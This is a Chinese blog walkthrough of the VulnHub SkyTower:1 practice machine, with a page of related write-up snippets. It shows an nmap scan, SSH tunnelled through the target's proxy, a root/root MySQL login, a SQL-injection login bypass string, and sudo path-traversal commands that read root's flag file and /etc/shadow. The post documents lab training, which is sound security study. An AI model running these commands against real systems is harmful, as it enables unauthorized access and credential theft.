Vulnhub:SkyTower:1靶机

已于 2023-03-19 20:51:08 修改
阅读量164 收藏
点赞数
文章标签: 安全 网络安全 Powered by 金山文档
于 2023-03-19 20:48:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/129656215
版权
该文章描述了一次渗透测试过程,首先对目标IP192.168.111.236进行了信息收集和端口扫描,利用nmap进行http枚举。接着,通过代理配置连接目标的SSH服务,尝试了弱口令登录MySQL获取其他用户密码。然后,使用用户sara的sudo权限查看root目录文件,最终通过flag.txt找到了root密码。
摘要由CSDN通过智能技术生成

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.236

绕过登录验证

得到用户账号密码

修改/etc/proxychains4.conf,把代理指向目标的3128端口

通过代理连接目标ssh

proxychains4 ssh john@192.168.111.236 -t "/bin/sh"

提权

使用弱口令:root|root,登录mysql,得到另外两个用户的密码

使用用户sara登录ssh

proxychains4 ssh sara@192.168.111.236 -t "/bin/sh"

sara的sudo权限

使用ls查看root家目录下的文件

sudo -u root /bin/ls /accounts/../root/

查看flag.txt,获得root的密码

sudo -u root /bin/cat /accounts/../root/flag.txt

ctostm
关注
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 297
vuluhub-skytower-1渗透靶场SkyTower 1提权
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 498
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
VulnHub靶机-SkyTower
Slow_的博客
02-26 815
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
VulhubSkyTower靶机详解
最新发布
weixin_62457642的博客
09-17 702
靶机SkyTower速刷
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 613
vulnhub靶场--SkyTower靶场
skytower靶机
weixin_74232792的博客
07-31 323
用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/,发现有个flag文件,查看一下,有root用户的密码,直接切换root,成功提权。发现在accounts目录下有root权限,用以下命令查看shadow文件,cat /accounts/../etc/shadow。转换其他思路,想到刚才扫到了一个代理端口,并且开放了ssh,尝试用这个账号密码连接一下。切换从数据库中发现的其他用户,Sara用户是可以ssh连接的,另外一个不行。
SkyTower靶机
weixin_71232352的博客
07-31 386
SkyTower靶机
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3252
每台都做一做,然后记录在博客里.供自己和大家一起学习.
vulnhub SkyTower: 1
箭雨镜屋
12-21 3078
本文思路: nmap扫描端口---->万能密码登录web,拿到john的ssh密码----->通过代理连接ssh,得到john的shell---->linpeas.sh扫描发现mysql---->通过mysql得到其他用户ssh账户密码---->用sara用户登录并通过sudo命令提权(找到root的密码)
渗透测试靶机----SkyTower
久恙502的博客
01-17 2053
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
VulnHub靶机渗透:SKYTOWER: 1
Mysmycbx的博客
06-24 697
靶机IP:192.168.56.101发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。1、SQL注入时需要通过提示信息修改注入代码,完成绕过。2、当获得到ssh密码后,发现ssh端口无法登录时,可以查看代理服务。3、使用proxytunnel代理软件,完成代理服务。使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为 192.168.56.101:22端口,映射到本地kali的6666端口。4、
vulnhub-SKYTOWER: 1靶场夺旗之战
shulao2010的博客
06-11 291
成功登录成功,但是好像没进系统,用我满级英语水平翻译了一下,大概是,你已经被公司停职了,没啥用了,给你2美元*7=14块人民币,玩去吧,但是你想得到这2块钱,还得ssh登录,要不2块钱都拿不到。ssh进行连接时,超时,仔细一看nmap扫描结果,大爷的,是过滤状态,说明端口没有明确信息表明是开启还是关闭,但是没有关闭,说明有戏,但是无法访问。此时只剩下3128端口,这个是一个代理服务,那么很有可能,22端口,需要经3128服务代理之后才能访问。那咋整,蚊子也是肉,我们直接利用用户名密码尝试ssh登录。
SKYTOWER: 1超详细靶机实战
weixin_68615160的博客
07-31 518
下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox,这是官网安装到默认路径就行打开后点击注册选择解压后的vbox文件然后点击左上角管理点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步就得到了一个iso镜像文件用vmware打开默认网卡模式为仅主机,更改为nat模式。
SkyTower靶机复现
weixin_52956666的博客
07-31 531
发现ssh登陆失败,扫描端口的时候22端口状态不是open,但是3128端口开放, 是http-proxy是代理端口。因为有后台,所以数据库大概率有账号密码,cat /var/www/login.php。将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址。加入 ' || 1=1#进行闭合,发现闭合成功,并且爆出了账号密码。同理,vim /etc/proxychains4.conf 也一样。尝试构造sql注入,发现有报错回显,说明存在sql注入。点击注册,将靶机资源加入进入,点击启动。
SkyTower靶机渗透测试
weixin_58786230的博客
07-31 326
【代码】SkyTower靶机渗透测试。
靶机渗透】SkyTower渗透练习_proxytunnel设置代理服务器隧道+.bashrc文件概念
serendipity1130的博客
08-31 597
SkyTower靶机: 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.168 2.nmap扫描端,口扫描到22和80端口,访问80端口: nmap 192.168.225.168 -sV -sC -Pn -n -v -T5 -p- 但是注意:这里的22端口被过滤了,百度查询squid发现这个是用来设置代理的 3.现在访问一下网站,看到登录框,测试发现存在注入漏洞: 4.因为过滤了and,将其替换为|| 123' || 1=1# ...
SkyTower1靶场练习&小白向&靶场安装&sql语句被过滤&万能SQL密码
jockerboss的博客
03-14 1140
SkyTower1靶场练习&小白向&靶场安装&sql语句被过滤&万能SQL密码 简单的通配符提权,小白入门必看靶场练习
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2257
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值